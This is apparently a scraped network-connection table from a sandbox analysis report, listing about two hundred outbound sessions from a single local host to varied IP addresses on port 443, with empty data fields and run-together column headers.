                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13094192.168.2.1454672195.119.132.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13095192.168.2.143469076.51.79.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13096192.168.2.1449638163.39.120.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13097192.168.2.1451342203.162.144.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13098192.168.2.14536721.3.152.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13099192.168.2.1447224183.137.76.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13100192.168.2.144306872.244.135.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13101192.168.2.1456062177.52.214.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13102192.168.2.1439782204.220.218.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13103192.168.2.1442344222.159.51.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13104192.168.2.144547839.22.4.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13105192.168.2.1441716143.222.127.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13106192.168.2.1433278119.36.63.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13107192.168.2.1453570165.110.138.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13108192.168.2.1439544148.88.59.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13109192.168.2.1456490175.92.233.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13110192.168.2.144728897.154.183.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13111192.168.2.1455472107.149.34.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13112192.168.2.144969049.155.227.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13113192.168.2.144794046.251.87.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13114192.168.2.1449824212.210.88.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13115192.168.2.1449530126.224.225.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13116192.168.2.145492689.119.224.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13117192.168.2.143295049.72.227.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13118192.168.2.143691432.55.255.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13119192.168.2.145143647.19.117.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13120192.168.2.1457420166.122.213.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13121192.168.2.145423664.214.148.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13122192.168.2.1460870131.147.169.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13123192.168.2.1458402113.43.215.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13124192.168.2.1446652208.96.253.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13125192.168.2.1459326153.255.10.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13126192.168.2.144515481.156.34.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13127192.168.2.1448474172.218.208.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13128192.168.2.143434880.87.149.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13129192.168.2.1444798122.35.146.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13130192.168.2.1455162158.179.216.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13131192.168.2.143451844.95.175.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13132192.168.2.1444728130.193.248.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13133192.168.2.144013487.231.252.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13134192.168.2.1435808211.105.184.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13135192.168.2.1459704148.115.241.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13136192.168.2.1438326173.121.57.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13137192.168.2.1435664216.192.64.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13138192.168.2.1435750152.242.85.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13139192.168.2.1434852173.76.116.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13140192.168.2.1456912159.97.134.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13141192.168.2.1449854173.142.135.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13142192.168.2.1436744126.190.106.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13143192.168.2.143587099.71.59.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13144192.168.2.1445908144.223.74.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13145192.168.2.1441882202.199.42.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13146192.168.2.145923676.111.134.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13147192.168.2.1448644180.249.156.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13148192.168.2.145728869.232.38.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13149192.168.2.144343445.238.81.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13150192.168.2.1433348161.76.227.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13151192.168.2.1454734181.34.55.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13152192.168.2.144913854.224.103.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13153192.168.2.1459264134.97.191.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13154192.168.2.1444526184.103.12.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13155192.168.2.143514462.120.22.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13156192.168.2.144978023.165.228.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13157192.168.2.145874879.245.32.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13158192.168.2.143986496.217.200.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13159192.168.2.1439500139.127.79.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13160192.168.2.145644892.18.24.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13161192.168.2.1451548134.122.196.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13162192.168.2.1437288156.202.125.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13163192.168.2.145999880.184.132.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13164192.168.2.1452190125.233.239.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13165192.168.2.1438754103.82.187.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13166192.168.2.1438466109.78.66.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13167192.168.2.1458572223.84.179.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13168192.168.2.1455128156.173.254.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13169192.168.2.1452682156.214.230.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13170192.168.2.145382235.178.216.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13171192.168.2.145512227.210.41.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13172192.168.2.1437176125.101.135.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13173192.168.2.1440914137.94.252.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13174192.168.2.144918436.221.155.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13175192.168.2.1448374128.4.23.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13176192.168.2.144703284.135.207.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13177192.168.2.1439222143.250.122.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13178192.168.2.145009688.121.54.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13179192.168.2.1446062176.145.42.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13180192.168.2.145543217.131.15.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13181192.168.2.14352529.208.164.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13182192.168.2.1434692100.237.135.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13183192.168.2.143711854.16.221.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13184192.168.2.145351070.155.168.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13185192.168.2.145881876.94.216.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13186192.168.2.1453266202.30.217.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13187192.168.2.1451114153.243.195.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13188192.168.2.144316012.146.28.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13189192.168.2.145616267.62.203.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13190192.168.2.1444262118.11.210.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13191192.168.2.1433636163.198.47.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192192.168.2.14507881.117.36.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13193192.168.2.1447770171.240.202.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13194192.168.2.1450888206.94.234.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13195192.168.2.145930487.247.94.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13196192.168.2.1440084184.20.181.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13197192.168.2.143753050.165.132.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13198192.168.2.144890424.187.28.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13199192.168.2.1433708176.36.223.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13200192.168.2.1438528150.16.245.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13201192.168.2.14486542.55.75.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13202192.168.2.1440922162.205.189.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13203192.168.2.1446624202.105.250.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13204192.168.2.144143271.220.214.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13205192.168.2.1457064217.71.182.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13206192.168.2.1448322195.23.96.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13207192.168.2.145776889.221.107.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13208192.168.2.144308448.189.2.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13209192.168.2.1433796164.175.73.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13210192.168.2.14393588.171.30.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13211192.168.2.145928220.198.227.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13212192.168.2.143732839.76.211.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13213192.168.2.145594073.171.248.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13214192.168.2.145560487.187.171.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13215192.168.2.1447936107.192.240.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13216192.168.2.143673884.98.138.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13217192.168.2.1441142134.207.180.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13218192.168.2.1440892198.154.220.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13219192.168.2.145143659.153.98.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13220192.168.2.1452652180.192.78.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13221192.168.2.145379494.205.182.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13222192.168.2.1444234192.184.121.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13223192.168.2.1442000221.40.202.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13224192.168.2.1457686115.156.155.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13225192.168.2.1456620175.197.236.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13226192.168.2.143846097.4.189.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13227192.168.2.145588813.60.122.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13228192.168.2.1445480180.198.49.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13229192.168.2.143347445.41.253.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13230192.168.2.145320431.90.67.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13231192.168.2.1439740201.185.9.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13232192.168.2.1453408179.17.122.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13233192.168.2.1438044105.3.135.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13234192.168.2.1449506122.117.160.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13235192.168.2.1451482146.5.8.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13236192.168.2.1449356223.66.86.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13237192.168.2.1451092150.31.235.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13238192.168.2.1448806109.72.244.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13239192.168.2.144975859.32.11.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13240192.168.2.143753882.130.151.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13241192.168.2.144232268.133.39.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13242192.168.2.1446110216.85.15.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13243192.168.2.1440882130.117.228.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13244192.168.2.1450362103.110.49.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13245192.168.2.143908670.52.45.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13246192.168.2.145128052.101.175.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13247192.168.2.1444106132.214.83.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13248192.168.2.1455780131.104.75.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13249192.168.2.143804681.102.116.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13250192.168.2.145034258.19.221.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13251192.168.2.1452926196.199.103.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13252192.168.2.144634644.175.31.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13253192.168.2.1432976168.0.91.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13254192.168.2.145202465.204.214.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13255192.168.2.1446726198.57.203.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13256192.168.2.143346247.64.146.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13257192.168.2.1444306165.112.10.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13258192.168.2.1434120156.126.46.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13259192.168.2.1453886139.88.38.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13260192.168.2.1439270151.0.242.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13261192.168.2.1455122191.95.215.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13262192.168.2.1446090172.171.5.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13263192.168.2.1449388178.164.87.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13264192.168.2.1456104205.127.57.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13265192.168.2.144956476.133.4.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13266192.168.2.1458610167.64.145.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13267192.168.2.1435028152.156.240.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13268192.168.2.1437480119.125.237.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13269192.168.2.144757242.214.134.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13270192.168.2.1452674219.112.95.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13271192.168.2.144568444.202.87.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13272192.168.2.144512224.140.69.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13273192.168.2.1441394152.246.172.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13274192.168.2.145544214.231.215.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13275192.168.2.1437168190.226.234.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13276192.168.2.145644225.106.224.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13277192.168.2.1450128180.46.124.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13278192.168.2.143687479.94.76.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13279192.168.2.143368258.60.189.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13280192.168.2.145887288.155.164.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13281192.168.2.1460072154.226.93.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13282192.168.2.1436228129.63.122.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13283192.168.2.145675493.28.28.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13284192.168.2.1449370196.37.47.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13285192.168.2.1437584101.16.98.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13286192.168.2.1447626113.108.44.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13287192.168.2.1440534114.162.184.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13288192.168.2.1448754173.171.3.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13289192.168.2.1451936143.21.3.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13290192.168.2.145366627.64.80.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13291192.168.2.1453406173.6.254.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13292192.168.2.1457060106.252.94.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13293192.168.2.144503295.191.152.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13294192.168.2.145127023.64.177.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13295192.168.2.1435994220.59.4.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13296192.168.2.1442094181.81.200.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13297192.168.2.1458898189.121.223.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13298192.168.2.14471004.45.135.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13299192.168.2.1458846192.55.207.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13300192.168.2.145586674.193.46.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13301192.168.2.1455446195.8.162.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13302192.168.2.1438844170.149.239.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13303192.168.2.1452154184.22.119.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13304192.168.2.143285457.85.14.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13305192.168.2.14563922.174.145.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
